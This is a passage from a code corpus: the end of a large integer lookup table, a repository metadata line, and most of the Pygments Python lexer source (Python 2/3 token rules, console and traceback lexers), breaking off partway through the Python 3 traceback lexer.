11976,11977,11978,11979,11980,11981,11982,11983,11984,11985,11986,11987,4196,11988,11989,11990, #11920
11991,11992,4977,11993,11994,11995,11996,11997,11998,11999,12000,12001,12002,12003,12004,12005, #11936
12006,12007,12008,12009,12010,12011,12012,12013,12014,12015,12016,12017,12018,12019,12020,12021, #11952
12022,12023,12024,12025,12026,12027,12028,12029,12030,12031,12032,12033,12034,12035,12036,12037, #11968
12038,12039,12040,12041,12042,12043,12044,12045,12046,12047,12048,12049,12050,12051,12052,12053, #11984
12054,12055,12056,12057,12058,12059,12060,12061,4978,12062,12063,12064,12065,12066,12067,12068, #12000
12069,12070,12071,12072,12073,12074,12075,12076,12077,12078,12079,12080,12081,12082,12083,12084, #12016
12085,12086,12087,12088,12089,12090,12091,12092,12093,12094,12095,12096,12097,12098,12099,12100, #12032
12101,12102,12103,12104,12105,12106,12107,12108,12109,12110,12111,12112,12113,12114,12115,12116, #12048
12117,12118,12119,12120,12121,12122,12123,4979,12124,12125,12126,12127,12128,4197,12129,12130, #12064
12131,12132,12133,12134,12135,12136,12137,12138,12139,12140,12141,12142,12143,12144,12145,12146, #12080
12147,12148,12149,12150,12151,12152,12153,12154,4980,12155,12156,12157,12158,12159,12160,4494, #12096
12161,12162,12163,12164,3811,12165,12166,12167,12168,12169,4495,12170,12171,4496,12172,12173, #12112
12174,12175,12176,3812,12177,12178,12179,12180,12181,12182,12183,12184,12185,12186,12187,12188, #12128
12189,12190,12191,12192,12193,12194,12195,12196,12197,12198,12199,12200,12201,12202,12203,12204, #12144
12205,12206,12207,12208,12209,12210,12211,12212,12213,12214,12215,12216,12217,12218,12219,12220, #12160
12221,4981,12222,12223,12224,12225,12226,12227,12228,12229,12230,12231,12232,12233,12234,12235, #12176
4982,12236,12237,12238,12239,12240,12241,12242,12243,12244,12245,4983,12246,12247,12248,12249, #12192
4984,12250,12251,12252,12253,12254,12255,12256,12257,12258,12259,12260,12261,12262,12263,12264, #12208
4985,12265,4497,12266,12267,12268,12269,12270,12271,12272,12273,12274,12275,12276,12277,12278, #12224
12279,12280,12281,12282,12283,12284,12285,12286,12287,4986,12288,12289,12290,12291,12292,12293, #12240
12294,12295,12296,2473,12297,12298,12299,12300,12301,12302,12303,12304,12305,12306,12307,12308, #12256
12309,12310,12311,12312,12313,12314,12315,12316,12317,12318,12319,3963,12320,12321,12322,12323, #12272
12324,12325,12326,12327,12328,12329,12330,12331,12332,4987,12333,12334,12335,12336,12337,12338, #12288
12339,12340,12341,12342,12343,12344,12345,12346,12347,12348,12349,12350,12351,12352,12353,12354, #12304
12355,12356,12357,12358,12359,3964,12360,12361,12362,12363,12364,12365,12366,12367,12368,12369, #12320
12370,3965,12371,12372,12373,12374,12375,12376,12377,12378,12379,12380,12381,12382,12383,12384, #12336
12385,12386,12387,12388,12389,12390,12391,12392,12393,12394,12395,12396,12397,12398,12399,12400, #12352
12401,12402,12403,12404,12405,12406,12407,12408,4988,12409,12410,12411,12412,12413,12414,12415, #12368
12416,12417,12418,12419,12420,12421,12422,12423,12424,12425,12426,12427,12428,12429,12430,12431, #12384
12432,12433,12434,12435,12436,12437,12438,3554,12439,12440,12441,12442,12443,12444,12445,12446, #12400
12447,12448,12449,12450,12451,12452,12453,12454,12455,12456,12457,12458,12459,12460,12461,12462, #12416
12463,12464,4989,12465,12466,12467,12468,12469,12470,12471,12472,12473,12474,12475,12476,12477, #12432
12478,12479,12480,4990,12481,12482,12483,12484,12485,12486,12487,12488,12489,4498,12490,12491, #12448
12492,12493,12494,12495,12496,12497,12498,12499,12500,12501,12502,12503,12504,12505,12506,12507, #12464
12508,12509,12510,12511,12512,12513,12514,12515,12516,12517,12518,12519,12520,12521,12522,12523, #12480
12524,12525,12526,12527,12528,12529,12530,12531,12532,12533,12534,12535,12536,12537,12538,12539, #12496
12540,12541,12542,12543,12544,12545,12546,12547,12548,12549,12550,12551,4991,12552,12553,12554, #12512
12555,12556,12557,12558,12559,12560,12561,12562,12563,12564,12565,12566,12567,12568,12569,12570, #12528
12571,12572,12573,12574,12575,12576,12577,12578,3036,12579,12580,12581,12582,12583,3966,12584, #12544
12585,12586,12587,12588,12589,12590,12591,12592,12593,12594,12595,12596,12597,12598,12599,12600, #12560
12601,12602,12603,12604,12605,12606,12607,12608,12609,12610,12611,12612,12613,12614,12615,12616, #12576
12617,12618,12619,12620,12621,12622,12623,12624,12625,12626,12627,12628,12629,12630,12631,12632, #12592
12633,12634,12635,12636,12637,12638,12639,12640,12641,12642,12643,12644,12645,12646,4499,12647, #12608
12648,12649,12650,12651,12652,12653,12654,12655,12656,12657,12658,12659,12660,12661,12662,12663, #12624
12664,12665,12666,12667,12668,12669,12670,12671,12672,12673,12674,12675,12676,12677,12678,12679, #12640
12680,12681,12682,12683,12684,12685,12686,12687,12688,12689,12690,12691,12692,12693,12694,12695, #12656
12696,12697,12698,4992,12699,12700,12701,12702,12703,12704,12705,12706,12707,12708,12709,12710, #12672
12711,12712,12713,12714,12715,12716,12717,12718,12719,12720,12721,12722,12723,12724,12725,12726, #12688
12727,12728,12729,12730,12731,12732,12733,12734,12735,12736,12737,12738,12739,12740,12741,12742, #12704
12743,12744,12745,12746,12747,12748,12749,12750,12751,12752,12753,12754,12755,12756,12757,12758, #12720
12759,12760,12761,12762,12763,12764,12765,12766,12767,12768,12769,12770,12771,12772,12773,12774, #12736
12775,12776,12777,12778,4993,2175,12779,12780,12781,12782,12783,12784,12785,12786,4500,12787, #12752
12788,12789,12790,12791,12792,12793,12794,12795,12796,12797,12798,12799,12800,12801,12802,12803, #12768
12804,12805,12806,12807,12808,12809,12810,12811,12812,12813,12814,12815,12816,12817,12818,12819, #12784
12820,12821,12822,12823,12824,12825,12826,4198,3967,12827,12828,12829,12830,12831,12832,12833, #12800
12834,12835,12836,12837,12838,12839,12840,12841,12842,12843,12844,12845,12846,12847,12848,12849, #12816
12850,12851,12852,12853,12854,12855,12856,12857,12858,12859,12860,12861,4199,12862,12863,12864, #12832
12865,12866,12867,12868,12869,12870,12871,12872,12873,12874,12875,12876,12877,12878,12879,12880, #12848
12881,12882,12883,12884,12885,12886,12887,4501,12888,12889,12890,12891,12892,12893,12894,12895, #12864
12896,12897,12898,12899,12900,12901,12902,12903,12904,12905,12906,12907,12908,12909,12910,12911, #12880
12912,4994,12913,12914,12915,12916,12917,12918,12919,12920,12921,12922,12923,12924,12925,12926, #12896
12927,12928,12929,12930,12931,12932,12933,12934,12935,12936,12937,12938,12939,12940,12941,12942, #12912
12943,12944,12945,12946,12947,12948,12949,12950,12951,12952,12953,12954,12955,12956,1772,12957, #12928
12958,12959,12960,12961,12962,12963,12964,12965,12966,12967,12968,12969,12970,12971,12972,12973, #12944
12974,12975,12976,12977,12978,12979,12980,12981,12982,12983,12984,12985,12986,12987,12988,12989, #12960
12990,12991,12992,12993,12994,12995,12996,12997,4502,12998,4503,12999,13000,13001,13002,13003, #12976
4504,13004,13005,13006,13007,13008,13009,13010,13011,13012,13013,13014,13015,13016,13017,13018, #12992
13019,13020,13021,13022,13023,13024,13025,13026,13027,13028,13029,3449,13030,13031,13032,13033, #13008
13034,13035,13036,13037,13038,13039,13040,13041,13042,13043,13044,13045,13046,13047,13048,13049, #13024
13050,13051,13052,13053,13054,13055,13056,13057,13058,13059,13060,13061,13062,13063,13064,13065, #13040
13066,13067,13068,13069,13070,13071,13072,13073,13074,13075,13076,13077,13078,13079,13080,13081, #13056
13082,13083,13084,13085,13086,13087,13088,13089,13090,13091,13092,13093,13094,13095,13096,13097, #13072
13098,13099,13100,13101,13102,13103,13104,13105,13106,13107,13108,13109,13110,13111,13112,13113, #13088
13114,13115,13116,13117,13118,3968,13119,4995,13120,13121,13122,13123,13124,13125,13126,13127, #13104
4505,13128,13129,13130,13131,13132,13133,13134,4996,4506,13135,13136,13137,13138,13139,4997, #13120
13140,13141,13142,13143,13144,13145,13146,13147,13148,13149,13150,13151,13152,13153,13154,13155, #13136
13156,13157,13158,13159,4998,13160,13161,13162,13163,13164,13165,13166,13167,13168,13169,13170, #13152
13171,13172,13173,13174,13175,13176,4999,13177,13178,13179,13180,13181,13182,13183,13184,13185, #13168
13186,13187,13188,13189,13190,13191,13192,13193,13194,13195,13196,13197,13198,13199,13200,13201, #13184
13202,13203,13204,13205,13206,5000,13207,13208,13209,13210,13211,13212,13213,13214,13215,13216, #13200
13217,13218,13219,13220,13221,13222,13223,13224,13225,13226,13227,4200,5001,13228,13229,13230, #13216
13231,13232,13233,13234,13235,13236,13237,13238,13239,13240,3969,13241,13242,13243,13244,3970, #13232
13245,13246,13247,13248,13249,13250,13251,13252,13253,13254,13255,13256,13257,13258,13259,13260, #13248
13261,13262,13263,13264,13265,13266,13267,13268,3450,13269,13270,13271,13272,13273,13274,13275, #13264
13276,5002,13277,13278,13279,13280,13281,13282,13283,13284,13285,13286,13287,13288,13289,13290, #13280
13291,13292,13293,13294,13295,13296,13297,13298,13299,13300,13301,13302,3813,13303,13304,13305, #13296
13306,13307,13308,13309,13310,13311,13312,13313,13314,13315,13316,13317,13318,13319,13320,13321, #13312
13322,13323,13324,13325,13326,13327,13328,4507,13329,13330,13331,13332,13333,13334,13335,13336, #13328
13337,13338,13339,13340,13341,5003,13342,13343,13344,13345,13346,13347,13348,13349,13350,13351, #13344
13352,13353,13354,13355,13356,13357,13358,13359,13360,13361,13362,13363,13364,13365,13366,13367, #13360
5004,13368,13369,13370,13371,13372,13373,13374,13375,13376,13377,13378,13379,13380,13381,13382, #13376
13383,13384,13385,13386,13387,13388,13389,13390,13391,13392,13393,13394,13395,13396,13397,13398, #13392
13399,13400,13401,13402,13403,13404,13405,13406,13407,13408,13409,13410,13411,13412,13413,13414, #13408
13415,13416,13417,13418,13419,13420,13421,13422,13423,13424,13425,13426,13427,13428,13429,13430, #13424
13431,13432,4508,13433,13434,13435,4201,13436,13437,13438,13439,13440,13441,13442,13443,13444, #13440
13445,13446,13447,13448,13449,13450,13451,13452,13453,13454,13455,13456,13457,5005,13458,13459, #13456
13460,13461,13462,13463,13464,13465,13466,13467,13468,13469,13470,4509,13471,13472,13473,13474, #13472
13475,13476,13477,13478,13479,13480,13481,13482,13483,13484,13485,13486,13487,13488,13489,13490, #13488
13491,13492,13493,13494,13495,13496,13497,13498,13499,13500,13501,13502,13503,13504,13505,13506, #13504
13507,13508,13509,13510,13511,13512,13513,13514,13515,13516,13517,13518,13519,13520,13521,13522, #13520
13523,13524,13525,13526,13527,13528,13529,13530,13531,13532,13533,13534,13535,13536,13537,13538, #13536
13539,13540,13541,13542,13543,13544,13545,13546,13547,13548,13549,13550,13551,13552,13553,13554, #13552
13555,13556,13557,13558,13559,13560,13561,13562,13563,13564,13565,13566,13567,13568,13569,13570, #13568
13571,13572,13573,13574,13575,13576,13577,13578,13579,13580,13581,13582,13583,13584,13585,13586, #13584
13587,13588,13589,13590,13591,13592,13593,13594,13595,13596,13597,13598,13599,13600,13601,13602, #13600
13603,13604,13605,13606,13607,13608,13609,13610,13611,13612,13613,13614,13615,13616,13617,13618, #13616
13619,13620,13621,13622,13623,13624,13625,13626,13627,13628,13629,13630,13631,13632,13633,13634, #13632
13635,13636,13637,13638,13639,13640,13641,13642,5006,13643,13644,13645,13646,13647,13648,13649, #13648
13650,13651,5007,13652,13653,13654,13655,13656,13657,13658,13659,13660,13661,13662,13663,13664, #13664
13665,13666,13667,13668,13669,13670,13671,13672,13673,13674,13675,13676,13677,13678,13679,13680, #13680
13681,13682,13683,13684,13685,13686,13687,13688,13689,13690,13691,13692,13693,13694,13695,13696, #13696
13697,13698,13699,13700,13701,13702,13703,13704,13705,13706,13707,13708,13709,13710,13711,13712, #13712
13713,13714,13715,13716,13717,13718,13719,13720,13721,13722,13723,13724,13725,13726,13727,13728, #13728
13729,13730,13731,13732,13733,13734,13735,13736,13737,13738,13739,13740,13741,13742,13743,13744, #13744
13745,13746,13747,13748,13749,13750,13751,13752,13753,13754,13755,13756,13757,13758,13759,13760, #13760
13761,13762,13763,13764,13765,13766,13767,13768,13769,13770,13771,13772,13773,13774,3273,13775, #13776
13776,13777,13778,13779,13780,13781,13782,13783,13784,13785,13786,13787,13788,13789,13790,13791, #13792
13792,13793,13794,13795,13796,13797,13798,13799,13800,13801,13802,13803,13804,13805,13806,13807, #13808
13808,13809,13810,13811,13812,13813,13814,13815,13816,13817,13818,13819,13820,13821,13822,13823, #13824
13824,13825,13826,13827,13828,13829,13830,13831,13832,13833,13834,13835,13836,13837,13838,13839, #13840
13840,13841,13842,13843,13844,13845,13846,13847,13848,13849,13850,13851,13852,13853,13854,13855, #13856
13856,13857,13858,13859,13860,13861,13862,13863,13864,13865,13866,13867,13868,13869,13870,13871, #13872
13872,13873,13874,13875,13876,13877,13878,13879,13880,13881,13882,13883,13884,13885,13886,13887, #13888
13888,13889,13890,13891,13892,13893,13894,13895,13896,13897,13898,13899,13900,13901,13902,13903, #13904
13904,13905,13906,13907,13908,13909,13910,13911,13912,13913,13914,13915,13916,13917,13918,13919, #13920
13920,13921,13922,13923,13924,13925,13926,13927,13928,13929,13930,13931,13932,13933,13934,13935, #13936
13936,13937,13938,13939,13940,13941,13942,13943,13944,13945,13946,13947,13948,13949,13950,13951, #13952
13952,13953,13954,13955,13956,13957,13958,13959,13960,13961,13962,13963,13964,13965,13966,13967, #13968
13968,13969,13970,13971,13972) #13973
# flake8: noqa
| lgpl-2.1 |
sagangwee/sagangwee.github.io | build/pygments/build/lib.linux-i686-2.7/pygments/lexers/python.py | 43 | 36222 | # -*- coding: utf-8 -*-
"""
pygments.lexers.python
~~~~~~~~~~~~~~~~~~~~~~
Lexers for Python and related languages.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import Lexer, RegexLexer, include, bygroups, using, \
default, words, combined, do_insertions
from pygments.util import get_bool_opt, shebang_matches
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Generic, Other, Error
from pygments import unistring as uni
__all__ = ['PythonLexer', 'PythonConsoleLexer', 'PythonTracebackLexer',
'Python3Lexer', 'Python3TracebackLexer', 'CythonLexer',
'DgLexer', 'NumPyLexer']
line_re = re.compile('.*?\n')
class PythonLexer(RegexLexer):
"""
For `Python <http://www.python.org>`_ source code.
"""
name = 'Python'
aliases = ['python', 'py', 'sage']
filenames = ['*.py', '*.pyw', '*.sc', 'SConstruct', 'SConscript', '*.tac', '*.sage']
mimetypes = ['text/x-python', 'application/x-python']
tokens = {
'root': [
(r'\n', Text),
(r'^(\s*)([rRuU]{,2}"""(?:.|\n)*?""")', bygroups(Text, String.Doc)),
(r"^(\s*)([rRuU]{,2}'''(?:.|\n)*?''')", bygroups(Text, String.Doc)),
(r'[^\S\n]+', Text),
(r'#.*$', Comment),
(r'[]{}:(),;[]', Punctuation),
(r'\\\n', Text),
(r'\\', Text),
(r'(in|is|and|or|not)\b', Operator.Word),
(r'!=|==|<<|>>|[-~+/*%=<>&^|.]', Operator),
include('keywords'),
(r'(def)((?:\s|\\\s)+)', bygroups(Keyword, Text), 'funcname'),
(r'(class)((?:\s|\\\s)+)', bygroups(Keyword, Text), 'classname'),
(r'(from)((?:\s|\\\s)+)', bygroups(Keyword.Namespace, Text),
'fromimport'),
(r'(import)((?:\s|\\\s)+)', bygroups(Keyword.Namespace, Text),
'import'),
include('builtins'),
include('backtick'),
('(?:[rR]|[uU][rR]|[rR][uU])"""', String, 'tdqs'),
("(?:[rR]|[uU][rR]|[rR][uU])'''", String, 'tsqs'),
('(?:[rR]|[uU][rR]|[rR][uU])"', String, 'dqs'),
("(?:[rR]|[uU][rR]|[rR][uU])'", String, 'sqs'),
('[uU]?"""', String, combined('stringescape', 'tdqs')),
("[uU]?'''", String, combined('stringescape', 'tsqs')),
('[uU]?"', String, combined('stringescape', 'dqs')),
("[uU]?'", String, combined('stringescape', 'sqs')),
include('name'),
include('numbers'),
],
'keywords': [
(words((
'assert', 'break', 'continue', 'del', 'elif', 'else', 'except',
'exec', 'finally', 'for', 'global', 'if', 'lambda', 'pass',
'print', 'raise', 'return', 'try', 'while', 'yield',
'yield from', 'as', 'with'), suffix=r'\b'),
Keyword),
],
'builtins': [
(words((
'__import__', 'abs', 'all', 'any', 'apply', 'basestring', 'bin',
'bool', 'buffer', 'bytearray', 'bytes', 'callable', 'chr', 'classmethod',
'cmp', 'coerce', 'compile', 'complex', 'delattr', 'dict', 'dir', 'divmod',
'enumerate', 'eval', 'execfile', 'exit', 'file', 'filter', 'float',
'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'hex', 'id',
'input', 'int', 'intern', 'isinstance', 'issubclass', 'iter', 'len',
'list', 'locals', 'long', 'map', 'max', 'min', 'next', 'object',
'oct', 'open', 'ord', 'pow', 'property', 'range', 'raw_input', 'reduce',
'reload', 'repr', 'reversed', 'round', 'set', 'setattr', 'slice',
'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type',
'unichr', 'unicode', 'vars', 'xrange', 'zip'),
prefix=r'(?<!\.)', suffix=r'\b'),
Name.Builtin),
(r'(?<!\.)(self|None|Ellipsis|NotImplemented|False|True'
r')\b', Name.Builtin.Pseudo),
(words((
'ArithmeticError', 'AssertionError', 'AttributeError',
'BaseException', 'DeprecationWarning', 'EOFError', 'EnvironmentError',
'Exception', 'FloatingPointError', 'FutureWarning', 'GeneratorExit',
'IOError', 'ImportError', 'ImportWarning', 'IndentationError',
'IndexError', 'KeyError', 'KeyboardInterrupt', 'LookupError',
'MemoryError', 'NameError', 'NotImplemented', 'NotImplementedError',
'OSError', 'OverflowError', 'OverflowWarning', 'PendingDeprecationWarning',
'ReferenceError', 'RuntimeError', 'RuntimeWarning', 'StandardError',
'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError',
'SystemExit', 'TabError', 'TypeError', 'UnboundLocalError',
'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError',
'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning',
'ValueError', 'VMSError', 'Warning', 'WindowsError',
'ZeroDivisionError'), prefix=r'(?<!\.)', suffix=r'\b'),
Name.Exception),
],
'numbers': [
(r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?j?', Number.Float),
(r'\d+[eE][+-]?[0-9]+j?', Number.Float),
(r'0[0-7]+j?', Number.Oct),
(r'0[bB][01]+', Number.Bin),
(r'0[xX][a-fA-F0-9]+', Number.Hex),
(r'\d+L', Number.Integer.Long),
(r'\d+j?', Number.Integer)
],
'backtick': [
('`.*?`', String.Backtick),
],
'name': [
(r'@[\w.]+', Name.Decorator),
('[a-zA-Z_]\w*', Name),
],
'funcname': [
('[a-zA-Z_]\w*', Name.Function, '#pop')
],
'classname': [
('[a-zA-Z_]\w*', Name.Class, '#pop')
],
'import': [
(r'(?:[ \t]|\\\n)+', Text),
(r'as\b', Keyword.Namespace),
(r',', Operator),
(r'[a-zA-Z_][\w.]*', Name.Namespace),
default('#pop') # all else: go back
],
'fromimport': [
(r'(?:[ \t]|\\\n)+', Text),
(r'import\b', Keyword.Namespace, '#pop'),
# if None occurs here, it's "raise x from None", since None can
# never be a module name
(r'None\b', Name.Builtin.Pseudo, '#pop'),
# sadly, in "raise x from y" y will be highlighted as namespace too
(r'[a-zA-Z_.][\w.]*', Name.Namespace),
# anything else here also means "raise x from y" and is therefore
# not an error
default('#pop'),
],
'stringescape': [
(r'\\([\\abfnrtv"\']|\n|N\{.*?\}|u[a-fA-F0-9]{4}|'
r'U[a-fA-F0-9]{8}|x[a-fA-F0-9]{2}|[0-7]{1,3})', String.Escape)
],
'strings': [
(r'%(\(\w+\))?[-#0 +]*([0-9]+|[*])?(\.([0-9]+|[*]))?'
'[hlL]?[diouxXeEfFgGcrs%]', String.Interpol),
(r'[^\\\'"%\n]+', String),
# quotes, percents and backslashes must be parsed one at a time
(r'[\'"\\]', String),
# unhandled string formatting sign
(r'%', String)
# newlines are an error (use "nl" state)
],
'nl': [
(r'\n', String)
],
'dqs': [
(r'"', String, '#pop'),
(r'\\\\|\\"|\\\n', String.Escape), # included here for raw strings
include('strings')
],
'sqs': [
(r"'", String, '#pop'),
(r"\\\\|\\'|\\\n", String.Escape), # included here for raw strings
include('strings')
],
'tdqs': [
(r'"""', String, '#pop'),
include('strings'),
include('nl')
],
'tsqs': [
(r"'''", String, '#pop'),
include('strings'),
include('nl')
],
}
def analyse_text(text):
return shebang_matches(text, r'pythonw?(2(\.\d)?)?') or \
'import ' in text[:1000]
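# Usage sketch: a minimal, hedged example of driving the lexer above through
# the public pygments API. ``_demo_highlight`` is a hypothetical helper added
# for illustration; imports are deferred to avoid import-time side effects.
def _demo_highlight(code=u'print "hello, world"'):
    from pygments import highlight
    from pygments.formatters import TerminalFormatter
    # Render the snippet with ANSI colour escapes suitable for a terminal.
    return highlight(code, PythonLexer(), TerminalFormatter())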
class Python3Lexer(RegexLexer):
"""
For `Python <http://www.python.org>`_ source code (version 3.0).
.. versionadded:: 0.10
"""
name = 'Python 3'
aliases = ['python3', 'py3']
filenames = [] # Nothing until Python 3 gets widespread
mimetypes = ['text/x-python3', 'application/x-python3']
flags = re.MULTILINE | re.UNICODE
uni_name = "[%s][%s]*" % (uni.xid_start, uni.xid_continue)
tokens = PythonLexer.tokens.copy()
tokens['keywords'] = [
(words((
'assert', 'break', 'continue', 'del', 'elif', 'else', 'except',
'finally', 'for', 'global', 'if', 'lambda', 'pass', 'raise',
'nonlocal', 'return', 'try', 'while', 'yield', 'yield from', 'as',
'with', 'True', 'False', 'None'), suffix=r'\b'),
Keyword),
]
tokens['builtins'] = [
(words((
'__import__', 'abs', 'all', 'any', 'bin', 'bool', 'bytearray', 'bytes',
'chr', 'classmethod', 'cmp', 'compile', 'complex', 'delattr', 'dict',
'dir', 'divmod', 'enumerate', 'eval', 'filter', 'float', 'format',
'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'hex', 'id',
'input', 'int', 'isinstance', 'issubclass', 'iter', 'len', 'list',
'locals', 'map', 'max', 'memoryview', 'min', 'next', 'object', 'oct',
'open', 'ord', 'pow', 'print', 'property', 'range', 'repr', 'reversed',
'round', 'set', 'setattr', 'slice', 'sorted', 'staticmethod', 'str',
'sum', 'super', 'tuple', 'type', 'vars', 'zip'), prefix=r'(?<!\.)',
suffix=r'\b'),
Name.Builtin),
(r'(?<!\.)(self|Ellipsis|NotImplemented)\b', Name.Builtin.Pseudo),
(words((
'ArithmeticError', 'AssertionError', 'AttributeError',
'BaseException', 'BufferError', 'BytesWarning', 'DeprecationWarning',
'EOFError', 'EnvironmentError', 'Exception', 'FloatingPointError',
'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError',
'ImportWarning', 'IndentationError', 'IndexError', 'KeyError',
'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError',
'NotImplementedError', 'OSError', 'OverflowError',
'PendingDeprecationWarning', 'ReferenceError',
'RuntimeError', 'RuntimeWarning', 'StopIteration',
'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError',
'TypeError', 'UnboundLocalError', 'UnicodeDecodeError',
'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError',
'UnicodeWarning', 'UserWarning', 'ValueError', 'VMSError', 'Warning',
'WindowsError', 'ZeroDivisionError',
# new builtin exceptions from PEP 3151
'BlockingIOError', 'ChildProcessError', 'ConnectionError',
'BrokenPipeError', 'ConnectionAbortedError', 'ConnectionRefusedError',
'ConnectionResetError', 'FileExistsError', 'FileNotFoundError',
'InterruptedError', 'IsADirectoryError', 'NotADirectoryError',
'PermissionError', 'ProcessLookupError', 'TimeoutError'),
prefix=r'(?<!\.)', suffix=r'\b'),
Name.Exception),
]
tokens['numbers'] = [
(r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?', Number.Float),
(r'0[oO][0-7]+', Number.Oct),
(r'0[bB][01]+', Number.Bin),
(r'0[xX][a-fA-F0-9]+', Number.Hex),
(r'\d+', Number.Integer)
]
tokens['backtick'] = []
tokens['name'] = [
(r'@\w+', Name.Decorator),
(uni_name, Name),
]
tokens['funcname'] = [
(uni_name, Name.Function, '#pop')
]
tokens['classname'] = [
(uni_name, Name.Class, '#pop')
]
tokens['import'] = [
(r'(\s+)(as)(\s+)', bygroups(Text, Keyword, Text)),
(r'\.', Name.Namespace),
(uni_name, Name.Namespace),
(r'(\s*)(,)(\s*)', bygroups(Text, Operator, Text)),
default('#pop') # all else: go back
]
tokens['fromimport'] = [
(r'(\s+)(import)\b', bygroups(Text, Keyword), '#pop'),
(r'\.', Name.Namespace),
(uni_name, Name.Namespace),
default('#pop'),
]
# don't highlight "%s" substitutions
tokens['strings'] = [
(r'[^\\\'"%\n]+', String),
# quotes, percents and backslashes must be parsed one at a time
(r'[\'"\\]', String),
# unhandled string formatting sign
(r'%', String)
# newlines are an error (use "nl" state)
]
def analyse_text(text):
return shebang_matches(text, r'pythonw?3(\.\d)?')
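# Usage sketch: ``analyse_text`` above feeds into ``pygments.lexers.guess_lexer``,
# which polls every registered lexer and returns the best-scoring one.
# ``_demo_guess`` is a hypothetical helper added for illustration.
def _demo_guess():
    from pygments.lexers import guess_lexer
    # A python3 shebang should steer the guess towards this lexer family.
    return guess_lexer(u'#!/usr/bin/env python3\nimport sys\n')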
class PythonConsoleLexer(Lexer):
"""
For Python console output or doctests, such as:
.. sourcecode:: pycon
>>> a = 'foo'
>>> print a
foo
>>> 1 / 0
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ZeroDivisionError: integer division or modulo by zero
Additional options:
`python3`
Use Python 3 lexer for code. Default is ``False``.
.. versionadded:: 1.0
"""
name = 'Python console session'
aliases = ['pycon']
mimetypes = ['text/x-python-doctest']
def __init__(self, **options):
self.python3 = get_bool_opt(options, 'python3', False)
Lexer.__init__(self, **options)
def get_tokens_unprocessed(self, text):
if self.python3:
pylexer = Python3Lexer(**self.options)
tblexer = Python3TracebackLexer(**self.options)
else:
pylexer = PythonLexer(**self.options)
tblexer = PythonTracebackLexer(**self.options)
curcode = ''
insertions = []
curtb = ''
tbindex = 0
tb = 0
for match in line_re.finditer(text):
line = match.group()
if line.startswith(u'>>> ') or line.startswith(u'... '):
tb = 0
insertions.append((len(curcode),
[(0, Generic.Prompt, line[:4])]))
curcode += line[4:]
elif line.rstrip() == u'...' and not tb:
# only a new >>> prompt can end an exception block
# otherwise an ellipsis in place of the traceback frames
# will be mishandled
insertions.append((len(curcode),
[(0, Generic.Prompt, u'...')]))
curcode += line[3:]
else:
if curcode:
for item in do_insertions(
insertions, pylexer.get_tokens_unprocessed(curcode)):
yield item
curcode = ''
insertions = []
if (line.startswith(u'Traceback (most recent call last):') or
re.match(u' File "[^"]+", line \\d+\\n$', line)):
tb = 1
curtb = line
tbindex = match.start()
elif line == 'KeyboardInterrupt\n':
yield match.start(), Name.Class, line
elif tb:
curtb += line
if not (line.startswith(' ') or line.strip() == u'...'):
tb = 0
for i, t, v in tblexer.get_tokens_unprocessed(curtb):
yield tbindex+i, t, v
curtb = ''
else:
yield match.start(), Generic.Output, line
if curcode:
for item in do_insertions(insertions,
pylexer.get_tokens_unprocessed(curcode)):
yield item
if curtb:
for i, t, v in tblexer.get_tokens_unprocessed(curtb):
yield tbindex+i, t, v
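# Usage sketch: ``get_tokens_unprocessed`` above yields (offset, tokentype,
# value) triples. ``_demo_console_tokens`` is a hypothetical helper that
# streams a small doctest-style session through it.
def _demo_console_tokens(session=u'>>> 1 + 1\n2\n'):
    for offset, tokentype, value in \
            PythonConsoleLexer().get_tokens_unprocessed(session):
        # Prompts come back as Generic.Prompt, the result as Generic.Output.
        print((offset, tokentype, value))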
class PythonTracebackLexer(RegexLexer):
"""
For Python tracebacks.
.. versionadded:: 0.7
"""
name = 'Python Traceback'
aliases = ['pytb']
filenames = ['*.pytb']
mimetypes = ['text/x-python-traceback']
tokens = {
'root': [
(r'^Traceback \(most recent call last\):\n',
Generic.Traceback, 'intb'),
# SyntaxError starts with this.
(r'^(?= File "[^"]+", line \d+)', Generic.Traceback, 'intb'),
(r'^.*\n', Other),
],
'intb': [
(r'^( File )("[^"]+")(, line )(\d+)(, in )(.+)(\n)',
bygroups(Text, Name.Builtin, Text, Number, Text, Name, Text)),
(r'^( File )("[^"]+")(, line )(\d+)(\n)',
bygroups(Text, Name.Builtin, Text, Number, Text)),
(r'^( )(.+)(\n)',
bygroups(Text, using(PythonLexer), Text)),
(r'^([ \t]*)(\.\.\.)(\n)',
bygroups(Text, Comment, Text)), # for doctests...
(r'^([^:]+)(: )(.+)(\n)',
bygroups(Generic.Error, Text, Name, Text), '#pop'),
(r'^([a-zA-Z_]\w*)(:?\n)',
bygroups(Generic.Error, Text), '#pop')
],
}
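# Usage sketch: ``Lexer.get_tokens`` (inherited by the traceback lexer above)
# yields (tokentype, value) pairs. ``_demo_traceback_tokens`` is a
# hypothetical helper; the exception name on the final line should come
# back tagged as Generic.Error.
def _demo_traceback_tokens():
    tb_text = (u'Traceback (most recent call last):\n'
               u'  File "example.py", line 1, in <module>\n'
               u'ZeroDivisionError: integer division or modulo by zero\n')
    return list(PythonTracebackLexer().get_tokens(tb_text))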
class Python3TracebackLexer(RegexLexer):
"""
For Python 3.0 tracebacks, with support for chained exceptions.
.. versionadded:: 1.0
"""
name = 'Python 3.0 Traceback'
aliases = ['py3tb']
filenames = ['*.py3tb']
mimetypes = ['text/x-python3-traceback']
tokens = {
'root': [
(r'\n', Text),
(r'^Traceback \(most recent call last\):\n', Generic.Traceback, 'intb'),
(r'^During handling of the above exception, another '
r'exception occurred:\n\n', Generic.Traceback),
(r'^The above exception was the direct cause of the '
r'following exception:\n\n', Generic.Traceback),
(r'^(?= File "[^"]+", line \d+)', Generic.Traceback, 'intb'),
],
